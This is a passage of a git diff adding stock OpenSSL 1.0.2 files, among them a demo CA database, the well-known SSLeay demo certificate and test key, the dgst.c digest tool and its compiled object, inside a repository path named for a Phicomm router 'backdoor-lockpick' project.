+R	980705233205Z	951009233205Z	01	certs/00000001	/CN=Eric Young
+E	951009233205Z		02	certs/00000002	/CN=Duncan Young
+R	980705233205Z	951201010000Z	03	certs/00000003	/CN=Tim Hudson
+V	980705233205Z		04	certs/00000004	/CN=Eric Young4
+V	980705233205Z		05	certs/00000004	/CN=Eric Young5
+V	980705233205Z		06	certs/00000004	/CN=Eric Young6
+V	980705233205Z		07	certs/00000004	/CN=Eric Young7
+V	980705233205Z		08	certs/00000004	/CN=Eric Young8
+V	980705233205Z		09	certs/00000004	/CN=Eric Young9
+V	980705233205Z		0A	certs/00000004	/CN=Eric YoungA
+V	980705233205Z		0B	certs/00000004	/CN=Eric YoungB
+V	980705233205Z		0C	certs/00000004	/CN=Eric YoungC
+V	980705233205Z		0D	certs/00000004	/CN=Eric YoungD
+V	980705233205Z		0E	certs/00000004	/CN=Eric YoungE
+V	980705233205Z		0F	certs/00000004	/CN=Eric YoungF
+V	980705233205Z		10	certs/00000004	/CN=Eric Young10
+V	980705233205Z		11	certs/00000004	/CN=Eric Young11
+V	980705233205Z		12	certs/00000004	/CN=Eric Young12
+V	980705233205Z		13	certs/00000004	/CN=Eric Young13
+V	980705233205Z		14	certs/00000004	/CN=Eric Young14
+V	980705233205Z		15	certs/00000004	/CN=Eric Young15
+V	980705233205Z		16	certs/00000004	/CN=Eric Young16
+V	980705233205Z		17	certs/00000004	/CN=Eric Young17
+V	961206150305Z		010C	unknown	/C=AU/SP=QLD/O=Mincom Pty. Ltd./OU=MTR/CN=Eric Young/Email=eay@mincom.oz.au
+V	961206153245Z		010D	unknown	/C=AU/SP=Queensland/O=Mincom Pty Ltd/OU=MTR/CN=Eric Young/Email=eay@mincom.oz.au
+V	970322074816Z		010E	unknown	/CN=Eric Young/Email=eay@mincom.oz.au
+V	970322075152Z		010F	unknown	/CN=Eric Young
+V	970322075906Z		0110	unknown	/CN=Eric Youngg
+V	970324092238Z		0111	unknown	/C=AU/SP=Queensland/CN=Eric Young
+V	970324221931Z		0112	unknown	/CN=Fred
+V	970324224934Z		0113	unknown	/C=AU/CN=eay
+V	971001005237Z		0114	unknown	/C=AU/SP=QLD/O=Mincom Pty Ltd/OU=MTR/CN=x509v3 test
+V	971001010331Z		0115	unknown	/C=AU/SP=Queensland/O=Mincom Pty Ltd/OU=MTR/CN=test again - x509v3
+V	971001013945Z		0117	unknown	/C=AU/SP=Queensland/O=Mincom Pty Ltd/OU=MTR/CN=x509v3 test
+V	971014225415Z		0118	unknown	/C=AU/SP=Queensland/CN=test
+V	971015004448Z		0119	unknown	/C=AU/SP=Queensland/O=Mincom Pty Ltd/OU=MTR/CN=test2
+V	971016035001Z		011A	unknown	/C=AU/SP=Queensland/O=Mincom Pty Ltd/OU=MTR/CN=test64
+V	971016080129Z		011B	unknown	/C=FR/O=ALCATEL/OU=Alcatel Mobile Phones/CN=bourque/Email=bourque@art.alcatel.fr
+V	971016224000Z		011D	unknown	/L=Bedford/O=Cranfield University/OU=Computer Centre/CN=Peter R Lister/Email=P.Lister@cranfield.ac.uk
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/demoCA/private/cakey.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/demoCA/private/cakey.pem
new file mode 100644
index 0000000..48fb18c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/demoCA/private/cakey.pem
@@ -0,0 +1,24 @@
+issuer= /C=AU/SOP=QLD/O=Mincom Pty. Ltd./OU=CS/CN=CA
+subject=/C=AU/SOP=QLD/O=Mincom Pty. Ltd./OU=CS/CN=SSLeay demo server
+-----BEGIN X509 CERTIFICATE-----
+
+MIIBgjCCASwCAQQwDQYJKoZIhvcNAQEEBQAwODELMAkGA1UEBhMCQVUxDDAKBgNV
+BAgTA1FMRDEbMBkGA1UEAxMSU1NMZWF5L3JzYSB0ZXN0IENBMB4XDTk1MTAwOTIz
+MzIwNVoXDTk4MDcwNTIzMzIwNVowYDELMAkGA1UEBhMCQVUxDDAKBgNVBAgTA1FM
+RDEZMBcGA1UEChMQTWluY29tIFB0eS4gTHRkLjELMAkGA1UECxMCQ1MxGzAZBgNV
+BAMTElNTTGVheSBkZW1vIHNlcnZlcjBcMA0GCSqGSIb3DQEBAQUAA0sAMEgCQQC3
+LCXcScWua0PFLkHBLm2VejqpA1F4RQ8q0VjRiPafjx/Z/aWH3ipdMVvuJGa/wFXb
+/nDFLDlfWp+oCPwhBtVPAgMBAAEwDQYJKoZIhvcNAQEEBQADQQArNFsihWIjBzb0
+DCsU0BvL2bvSwJrPEqFlkDq3F4M6EGutL9axEcANWgbbEdAvNJD1dmEmoWny27Pn
+IMs6ZOZB
+-----END X509 CERTIFICATE-----
+-----BEGIN RSA PRIVATE KEY-----
+
+MIIBPAIBAAJBALcsJdxJxa5rQ8UuQcEubZV6OqkDUXhFDyrRWNGI9p+PH9n9pYfe
+Kl0xW+4kZr/AVdv+cMUsOV9an6gI/CEG1U8CAwEAAQJAXJMBZ34ZXHd1vtgL/3hZ
+hexKbVTx/djZO4imXO/dxPGRzG2ylYZpHmG32/T1kaHpZlCHoEPgHoSzmxYXfxjG
+sQIhAPmZ/bQOjmRUHM/VM2X5zrjjM6z18R1P6l3ObFwt9FGdAiEAu943Yh9SqMRw
+tL0xHGxKmM/YJueUw1gB6sLkETN71NsCIQCeT3RhoqXfrpXDoEcEU+gwzjI1bpxq
+agiNTOLfqGoA5QIhAIQFYjgzONxex7FLrsKBm16N2SFl5pXsN9SpRqqL2n63AiEA
+g9VNIQ3xwpw7og3IbONifeku+J9qGMGQJMKwSTwrFtI=
+-----END RSA PRIVATE KEY-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/demoCA/serial b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/demoCA/serial
new file mode 100644
index 0000000..69fa0ff
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/demoCA/serial
@@ -0,0 +1 @@
+011E
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/demoSRP/srp_verifier.txt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/demoSRP/srp_verifier.txt
new file mode 100644
index 0000000..ccae629
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/demoSRP/srp_verifier.txt
@@ -0,0 +1,6 @@
+# This is a file that will be filled by the openssl srp routine.
+# You can initialize the file with additional groups, these are
+# records starting with a I followed by the g and N values and the id.
+# The exact values ... you have to dig this out from the source of srp.c
+# or srp_vfy.c
+# The last value of an I is used as the default group for new users.  
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/demoSRP/srp_verifier.txt.attr b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/demoSRP/srp_verifier.txt.attr
new file mode 100644
index 0000000..8f7e63a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/demoSRP/srp_verifier.txt.attr
@@ -0,0 +1 @@
+unique_subject = yes
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dgst.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dgst.c
new file mode 100644
index 0000000..adb7a06
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dgst.c
@@ -0,0 +1,609 @@
+/* apps/dgst.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include "apps.h"
+#include <openssl/bio.h>
+#include <openssl/err.h>
+#include <openssl/evp.h>
+#include <openssl/objects.h>
+#include <openssl/x509.h>
+#include <openssl/pem.h>
+#include <openssl/hmac.h>
+
+#undef BUFSIZE
+#define BUFSIZE 1024*8
+
+#undef PROG
+#define PROG    dgst_main
+
+int do_fp(BIO *out, unsigned char *buf, BIO *bp, int sep, int binout,
+          EVP_PKEY *key, unsigned char *sigin, int siglen,
+          const char *sig_name, const char *md_name,
+          const char *file, BIO *bmd);
+
+static void list_md_fn(const EVP_MD *m,
+                       const char *from, const char *to, void *arg)
+{
+    const char *mname;
+    /* Skip aliases */
+    if (!m)
+        return;
+    mname = OBJ_nid2ln(EVP_MD_type(m));
+    /* Skip shortnames */
+    if (strcmp(from, mname))
+        return;
+    /* Skip clones */
+    if (EVP_MD_flags(m) & EVP_MD_FLAG_PKEY_DIGEST)
+        return;
+    if (strchr(mname, ' '))
+        mname = EVP_MD_name(m);
+    BIO_printf(arg, "-%-14s to use the %s message digest algorithm\n",
+               mname, mname);
+}
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    ENGINE *e = NULL, *impl = NULL;
+    unsigned char *buf = NULL;
+    int i, err = 1;
+    const EVP_MD *md = NULL, *m;
+    BIO *in = NULL, *inp;
+    BIO *bmd = NULL;
+    BIO *out = NULL;
+#define PROG_NAME_SIZE  39
+    char pname[PROG_NAME_SIZE + 1];
+    int separator = 0;
+    int debug = 0;
+    int keyform = FORMAT_PEM;
+    const char *outfile = NULL, *keyfile = NULL;
+    const char *sigfile = NULL, *randfile = NULL;
+    int out_bin = -1, want_pub = 0, do_verify = 0;
+    EVP_PKEY *sigkey = NULL;
+    unsigned char *sigbuf = NULL;
+    int siglen = 0;
+    char *passargin = NULL, *passin = NULL;
+#ifndef OPENSSL_NO_ENGINE
+    char *engine = NULL;
+    int engine_impl = 0;
+#endif
+    char *hmac_key = NULL;
+    char *mac_name = NULL;
+    int non_fips_allow = 0;
+    STACK_OF(OPENSSL_STRING) *sigopts = NULL, *macopts = NULL;
+
+    apps_startup();
+
+    if ((buf = (unsigned char *)OPENSSL_malloc(BUFSIZE)) == NULL) {
+        BIO_printf(bio_err, "out of memory\n");
+        goto end;
+    }
+    if (bio_err == NULL)
+        if ((bio_err = BIO_new(BIO_s_file())) != NULL)
+            BIO_set_fp(bio_err, stderr, BIO_NOCLOSE | BIO_FP_TEXT);
+
+    if (!load_config(bio_err, NULL))
+        goto end;
+
+    /* first check the program name */
+    program_name(argv[0], pname, sizeof pname);
+
+    md = EVP_get_digestbyname(pname);
+
+    argc--;
+    argv++;
+    while (argc > 0) {
+        if ((*argv)[0] != '-')
+            break;
+        if (strcmp(*argv, "-c") == 0)
+            separator = 1;
+        else if (strcmp(*argv, "-r") == 0)
+            separator = 2;
+        else if (strcmp(*argv, "-rand") == 0) {
+            if (--argc < 1)
+                break;
+            randfile = *(++argv);
+        } else if (strcmp(*argv, "-out") == 0) {
+            if (--argc < 1)
+                break;
+            outfile = *(++argv);
+        } else if (strcmp(*argv, "-sign") == 0) {
+            if (--argc < 1)
+                break;
+            keyfile = *(++argv);
+        } else if (!strcmp(*argv, "-passin")) {
+            if (--argc < 1)
+                break;
+            passargin = *++argv;
+        } else if (strcmp(*argv, "-verify") == 0) {
+            if (--argc < 1)
+                break;
+            keyfile = *(++argv);
+            want_pub = 1;
+            do_verify = 1;
+        } else if (strcmp(*argv, "-prverify") == 0) {
+            if (--argc < 1)
+                break;
+            keyfile = *(++argv);
+            do_verify = 1;
+        } else if (strcmp(*argv, "-signature") == 0) {
+            if (--argc < 1)
+                break;
+            sigfile = *(++argv);
+        } else if (strcmp(*argv, "-keyform") == 0) {
+            if (--argc < 1)
+                break;
+            keyform = str2fmt(*(++argv));
+        }
+#ifndef OPENSSL_NO_ENGINE
+        else if (strcmp(*argv, "-engine") == 0) {
+            if (--argc < 1)
+                break;
+            engine = *(++argv);
+            e = setup_engine(bio_err, engine, 0);
+        } else if (strcmp(*argv, "-engine_impl") == 0)
+            engine_impl = 1;
+#endif
+        else if (strcmp(*argv, "-hex") == 0)
+            out_bin = 0;
+        else if (strcmp(*argv, "-binary") == 0)
+            out_bin = 1;
+        else if (strcmp(*argv, "-d") == 0)
+            debug = 1;
+        else if (!strcmp(*argv, "-fips-fingerprint"))
+            hmac_key = "etaonrishdlcupfm";
+        else if (strcmp(*argv, "-non-fips-allow") == 0)
+            non_fips_allow = 1;
+        else if (!strcmp(*argv, "-hmac")) {
+            if (--argc < 1)
+                break;
+            hmac_key = *++argv;
+        } else if (!strcmp(*argv, "-mac")) {
+            if (--argc < 1)
+                break;
+            mac_name = *++argv;
+        } else if (strcmp(*argv, "-sigopt") == 0) {
+            if (--argc < 1)
+                break;
+            if (!sigopts)
+                sigopts = sk_OPENSSL_STRING_new_null();
+            if (!sigopts || !sk_OPENSSL_STRING_push(sigopts, *(++argv)))
+                break;
+        } else if (strcmp(*argv, "-macopt") == 0) {
+            if (--argc < 1)
+                break;
+            if (!macopts)
+                macopts = sk_OPENSSL_STRING_new_null();
+            if (!macopts || !sk_OPENSSL_STRING_push(macopts, *(++argv)))
+                break;
+        } else if ((m = EVP_get_digestbyname(&((*argv)[1]))) != NULL)
+            md = m;
+        else
+            break;
+        argc--;
+        argv++;
+    }
+
+    if (do_verify && !sigfile) {
+        BIO_printf(bio_err,
+                   "No signature to verify: use the -signature option\n");
+        goto end;
+    }
+
+    if ((argc > 0) && (argv[0][0] == '-')) { /* bad option */
+        BIO_printf(bio_err, "unknown option '%s'\n", *argv);
+        BIO_printf(bio_err, "options are\n");
+        BIO_printf(bio_err,
+                   "-c              to output the digest with separating colons\n");
+        BIO_printf(bio_err,
+                   "-r              to output the digest in coreutils format\n");
+        BIO_printf(bio_err, "-d              to output debug info\n");
+        BIO_printf(bio_err, "-hex            output as hex dump\n");
+        BIO_printf(bio_err, "-binary         output in binary form\n");
+        BIO_printf(bio_err, "-hmac arg       set the HMAC key to arg\n");
+        BIO_printf(bio_err, "-non-fips-allow allow use of non FIPS digest\n");
+        BIO_printf(bio_err,
+                   "-sign   file    sign digest using private key in file\n");
+        BIO_printf(bio_err,
+                   "-verify file    verify a signature using public key in file\n");
+        BIO_printf(bio_err,
+                   "-prverify file  verify a signature using private key in file\n");
+        BIO_printf(bio_err,
+                   "-keyform arg    key file format (PEM or ENGINE)\n");
+        BIO_printf(bio_err,
+                   "-out filename   output to filename rather than stdout\n");
+        BIO_printf(bio_err, "-signature file signature to verify\n");
+        BIO_printf(bio_err, "-sigopt nm:v    signature parameter\n");
+        BIO_printf(bio_err, "-hmac key       create hashed MAC with key\n");
+        BIO_printf(bio_err,
+                   "-mac algorithm  create MAC (not neccessarily HMAC)\n");
+        BIO_printf(bio_err,
+                   "-macopt nm:v    MAC algorithm parameters or key\n");
+#ifndef OPENSSL_NO_ENGINE
+        BIO_printf(bio_err,
+                   "-engine e       use engine e, possibly a hardware device.\n");
+#endif
+
+        EVP_MD_do_all_sorted(list_md_fn, bio_err);
+        goto end;
+    }
+#ifndef OPENSSL_NO_ENGINE
+    if (engine_impl)
+        impl = e;
+#endif
+
+    in = BIO_new(BIO_s_file());
+    bmd = BIO_new(BIO_f_md());
+    if (debug) {
+        BIO_set_callback(in, BIO_debug_callback);
+        /* needed for windows 3.1 */
+        BIO_set_callback_arg(in, (char *)bio_err);
+    }
+
+    if (!app_passwd(bio_err, passargin, NULL, &passin, NULL)) {
+        BIO_printf(bio_err, "Error getting password\n");
+        goto end;
+    }
+
+    if ((in == NULL) || (bmd == NULL)) {
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+
+    if (out_bin == -1) {
+        if (keyfile)
+            out_bin = 1;
+        else
+            out_bin = 0;
+    }
+
+    if (randfile)
+        app_RAND_load_file(randfile, bio_err, 0);
+
+    if (outfile) {
+        if (out_bin)
+            out = BIO_new_file(outfile, "wb");
+        else
+            out = BIO_new_file(outfile, "w");
+    } else {
+        out = BIO_new_fp(stdout, BIO_NOCLOSE);
+#ifdef OPENSSL_SYS_VMS
+        {
+            BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+            out = BIO_push(tmpbio, out);
+        }
+#endif
+    }
+
+    if (!out) {
+        BIO_printf(bio_err, "Error opening output file %s\n",
+                   outfile ? outfile : "(stdout)");
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+    if ((! !mac_name + ! !keyfile + ! !hmac_key) > 1) {
+        BIO_printf(bio_err, "MAC and Signing key cannot both be specified\n");
+        goto end;
+    }
+
+    if (keyfile) {
+        if (want_pub)
+            sigkey = load_pubkey(bio_err, keyfile, keyform, 0, NULL,
+                                 e, "key file");
+        else
+            sigkey = load_key(bio_err, keyfile, keyform, 0, passin,
+                              e, "key file");
+        if (!sigkey) {
+            /*
+             * load_[pub]key() has already printed an appropriate message
+             */
+            goto end;
+        }
+    }
+
+    if (mac_name) {
+        EVP_PKEY_CTX *mac_ctx = NULL;
+        int r = 0;
+        if (!init_gen_str(bio_err, &mac_ctx, mac_name, impl, 0))
+            goto mac_end;
+        if (macopts) {
+            char *macopt;
+            for (i = 0; i < sk_OPENSSL_STRING_num(macopts); i++) {
+                macopt = sk_OPENSSL_STRING_value(macopts, i);
+                if (pkey_ctrl_string(mac_ctx, macopt) <= 0) {
+                    BIO_printf(bio_err,
+                               "MAC parameter error \"%s\"\n", macopt);
+                    ERR_print_errors(bio_err);
+                    goto mac_end;
+                }
+            }
+        }
+        if (EVP_PKEY_keygen(mac_ctx, &sigkey) <= 0) {
+            BIO_puts(bio_err, "Error generating key\n");
+            ERR_print_errors(bio_err);
+            goto mac_end;
+        }
+        r = 1;
+ mac_end:
+        if (mac_ctx)
+            EVP_PKEY_CTX_free(mac_ctx);
+        if (r == 0)
+            goto end;
+    }
+
+    if (non_fips_allow) {
+        EVP_MD_CTX *md_ctx;
+        BIO_get_md_ctx(bmd, &md_ctx);
+        EVP_MD_CTX_set_flags(md_ctx, EVP_MD_CTX_FLAG_NON_FIPS_ALLOW);
+    }
+
+    if (hmac_key) {
+        sigkey = EVP_PKEY_new_mac_key(EVP_PKEY_HMAC, impl,
+                                      (unsigned char *)hmac_key, -1);
+        if (!sigkey)
+            goto end;
+    }
+
+    if (sigkey) {
+        EVP_MD_CTX *mctx = NULL;
+        EVP_PKEY_CTX *pctx = NULL;
+        int r;
+        if (!BIO_get_md_ctx(bmd, &mctx)) {
+            BIO_printf(bio_err, "Error getting context\n");
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+        if (do_verify)
+            r = EVP_DigestVerifyInit(mctx, &pctx, md, impl, sigkey);
+        else
+            r = EVP_DigestSignInit(mctx, &pctx, md, impl, sigkey);
+        if (!r) {
+            BIO_printf(bio_err, "Error setting context\n");
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+        if (sigopts) {
+            char *sigopt;
+            for (i = 0; i < sk_OPENSSL_STRING_num(sigopts); i++) {
+                sigopt = sk_OPENSSL_STRING_value(sigopts, i);
+                if (pkey_ctrl_string(pctx, sigopt) <= 0) {
+                    BIO_printf(bio_err, "parameter error \"%s\"\n", sigopt);
+                    ERR_print_errors(bio_err);
+                    goto end;
+                }
+            }
+        }
+    }
+    /* we use md as a filter, reading from 'in' */
+    else {
+        EVP_MD_CTX *mctx = NULL;
+        if (!BIO_get_md_ctx(bmd, &mctx)) {
+            BIO_printf(bio_err, "Error getting context\n");
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+        if (md == NULL)
+            md = EVP_md5();
+        if (!EVP_DigestInit_ex(mctx, md, impl)) {
+            BIO_printf(bio_err, "Error setting digest %s\n", pname);
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+    }
+
+    if (sigfile && sigkey) {
+        BIO *sigbio;
+        sigbio = BIO_new_file(sigfile, "rb");
+        siglen = EVP_PKEY_size(sigkey);
+        sigbuf = OPENSSL_malloc(siglen);
+        if (!sigbio) {
+            BIO_printf(bio_err, "Error opening signature file %s\n", sigfile);
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+        siglen = BIO_read(sigbio, sigbuf, siglen);
+        BIO_free(sigbio);
+        if (siglen <= 0) {
+            BIO_printf(bio_err, "Error reading signature file %s\n", sigfile);
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+    }
+    inp = BIO_push(bmd, in);
+
+    if (md == NULL) {
+        EVP_MD_CTX *tctx;
+        BIO_get_md_ctx(bmd, &tctx);
+        md = EVP_MD_CTX_md(tctx);
+    }
+
+    if (argc == 0) {
+        BIO_set_fp(in, stdin, BIO_NOCLOSE);
+        err = do_fp(out, buf, inp, separator, out_bin, sigkey, sigbuf,
+                    siglen, NULL, NULL, "stdin", bmd);
+    } else {
+        const char *md_name = NULL, *sig_name = NULL;
+        if (!out_bin) {
+            if (sigkey) {
+                const EVP_PKEY_ASN1_METHOD *ameth;
+                ameth = EVP_PKEY_get0_asn1(sigkey);
+                if (ameth)
+                    EVP_PKEY_asn1_get0_info(NULL, NULL,
+                                            NULL, NULL, &sig_name, ameth);
+            }
+            if (md)
+                md_name = EVP_MD_name(md);
+        }
+        err = 0;
+        for (i = 0; i < argc; i++) {
+            int r;
+            if (BIO_read_filename(in, argv[i]) <= 0) {
+                perror(argv[i]);
+                err++;
+                continue;
+            } else
+                r = do_fp(out, buf, inp, separator, out_bin, sigkey, sigbuf,
+                          siglen, sig_name, md_name, argv[i], bmd);
+            if (r)
+                err = r;
+            (void)BIO_reset(bmd);
+        }
+    }
+ end:
+    if (buf != NULL) {
+        OPENSSL_cleanse(buf, BUFSIZE);
+        OPENSSL_free(buf);
+    }
+    if (in != NULL)
+        BIO_free(in);
+    if (passin)
+        OPENSSL_free(passin);
+    BIO_free_all(out);
+    EVP_PKEY_free(sigkey);
+    if (sigopts)
+        sk_OPENSSL_STRING_free(sigopts);
+    if (macopts)
+        sk_OPENSSL_STRING_free(macopts);
+    if (sigbuf)
+        OPENSSL_free(sigbuf);
+    if (bmd != NULL)
+        BIO_free(bmd);
+    apps_shutdown();
+    OPENSSL_EXIT(err);
+}
+
+int do_fp(BIO *out, unsigned char *buf, BIO *bp, int sep, int binout,
+          EVP_PKEY *key, unsigned char *sigin, int siglen,
+          const char *sig_name, const char *md_name,
+          const char *file, BIO *bmd)
+{
+    size_t len;
+    int i;
+
+    for (;;) {
+        i = BIO_read(bp, (char *)buf, BUFSIZE);
+        if (i < 0) {
+            BIO_printf(bio_err, "Read Error in %s\n", file);
+            ERR_print_errors(bio_err);
+            return 1;
+        }
+        if (i == 0)
+            break;
+    }
+    if (sigin) {
+        EVP_MD_CTX *ctx;
+        BIO_get_md_ctx(bp, &ctx);
+        i = EVP_DigestVerifyFinal(ctx, sigin, (unsigned int)siglen);
+        if (i > 0)
+            BIO_printf(out, "Verified OK\n");
+        else if (i == 0) {
+            BIO_printf(out, "Verification Failure\n");
+            return 1;
+        } else {
+            BIO_printf(bio_err, "Error Verifying Data\n");
+            ERR_print_errors(bio_err);
+            return 1;
+        }
+        return 0;
+    }
+    if (key) {
+        EVP_MD_CTX *ctx;
+        BIO_get_md_ctx(bp, &ctx);
+        len = BUFSIZE;
+        if (!EVP_DigestSignFinal(ctx, buf, &len)) {
+            BIO_printf(bio_err, "Error Signing Data\n");
+            ERR_print_errors(bio_err);
+            return 1;
+        }
+    } else {
+        len = BIO_gets(bp, (char *)buf, BUFSIZE);
+        if ((int)len < 0) {
+            ERR_print_errors(bio_err);
+            return 1;
+        }
+    }
+
+    if (binout)
+        BIO_write(out, buf, len);
+    else if (sep == 2) {
+        for (i = 0; i < (int)len; i++)
+            BIO_printf(out, "%02x", buf[i]);
+        BIO_printf(out, " *%s\n", file);
+    } else {
+        if (sig_name) {
+            BIO_puts(out, sig_name);
+            if (md_name)
+                BIO_printf(out, "-%s", md_name);
+            BIO_printf(out, "(%s)= ", file);
+        } else if (md_name)
+            BIO_printf(out, "%s(%s)= ", md_name, file);
+        else
+            BIO_printf(out, "(%s)= ", file);
+        for (i = 0; i < (int)len; i++) {
+            if (sep && (i != 0))
+                BIO_printf(out, ":");
+            BIO_printf(out, "%02x", buf[i]);
+        }
+        BIO_printf(out, "\n");
+    }
+    return 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dgst.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dgst.o
new file mode 100644
index 0000000000000000000000000000000000000000..85169a4a3c8faa2e889794a952f0acbcce5aa09e
GIT binary patch
literal 19888
zcmeHOeSB2anLbGfgn*OyNkqjfPBbWqnS2otH4`#$0|SW=5aeT+%uJGz$;>!&M+i_r
zNyO<8bX(ExN3Gr3*4EbQuiC1ukotwJ)po75?z+2G*IK4&wAB{7^&|Vf?>Tq!<}$bY
z@!LQ5{Fr;sdCv1b=RNN^_uPBW4SPM_rG*6r!b}C?YB5nVQ6XxVPvl!D+aes|H1R>%
zoImSB<7I<s0Nv}_(<j|)+tV+)yVmOIPu$m@Kx+CJoxJG}_4IS?>1U`kG?MDn)9+FK
z{=!t-5e=B$^sfofhenJu%vxm*hVJ#=^qZT#>9@S;_uQNG;YL(<Z+4Biw`4K9ezSX%
zd$W7X(@&#Y?(5v^+-u!k?dd<DGkW?LYueIJ>-&GZUe63V?*M+<>zwJ$e9L)1<h_|k
zoDacSPq#VCk#MgnR0Q?Rl*%eq(p@7@2n{`b#|!3FdV050lRjr4=gj~%G~!Ml8>rDU
zSAh{Q-&dZxMih~7%0Gs&&dw_oB6YvMf48$-lnvejkn80mJK&@bdz~%H$UwJtJ6ke$
zI==u_gbt1DIa7&4w3Pnn;#3~+BIS;~FYcr0Ok4V+?A?%AIdt6c<Z%N$(1*L6%@6?n
zSevsMgQ0v$wM}k=;L&r<c*%YQeyXRzd}w6g9L4?tHcOS+IglNC-8d(s8h}2%E^DSh
z4a8?=Van}sjd_PDgl!8W&gMO{mXv+(toh#brxb$r@n>bbFiFh7PsAqsLud;FT_KF6
zdd6^8n6qr<(3o+SH~pJa!kJHoT%g%EdNmrp?oIzbpY7<Y=(9*wl8ap0bh9mef_ky{
z)zLFy(*MGnJ~`p-==0o!x|M!S&unt)LB0Nbnv+H`!TSDZ)^Aj^-|d^2{^?JTo(4U}
z%V6yqJ^jHEjJ1CAZ=Z(~o7aQR#{h7R;E2W{CoqE(P>#zJw?Xcx&~QRhuVtHXrL@46
znp&U+(lrKg@wmnn$^AoYOj3_caYCMCOE8oD6}YAEr%@ECI;AJq2|Zm*-1ISA24I$8
z55yDYa5!=U93)v@T&|N;8X74ZY(d4$mEPg|=-PIVzvLQwq6+vpQ};hz0=^L!))+N?
zq>$+v^riy4T>>To&JjE#&}n9x&CFKJK#f<O`_$Pv4hc<a5x`89s##wI87Oa3WgX9+
zp_65YHb9LxbFq8hVrO;P&<ZH2@R@5N_U+fOK;(h{IUk%VgRYki7Le|?lF`aj3{&S3
z<CkciSyF;4UKK_t`=h_0_b{<R@8_rLoke=LGrg^&51vZ9glK(A2;)by5n6_PALg^y
z<n>?<8D5dcFzd)`FpCU61xd4mwb|J?Hgft-gf=yon6D6XSBZBxP~uJh`w1K!h|2ox
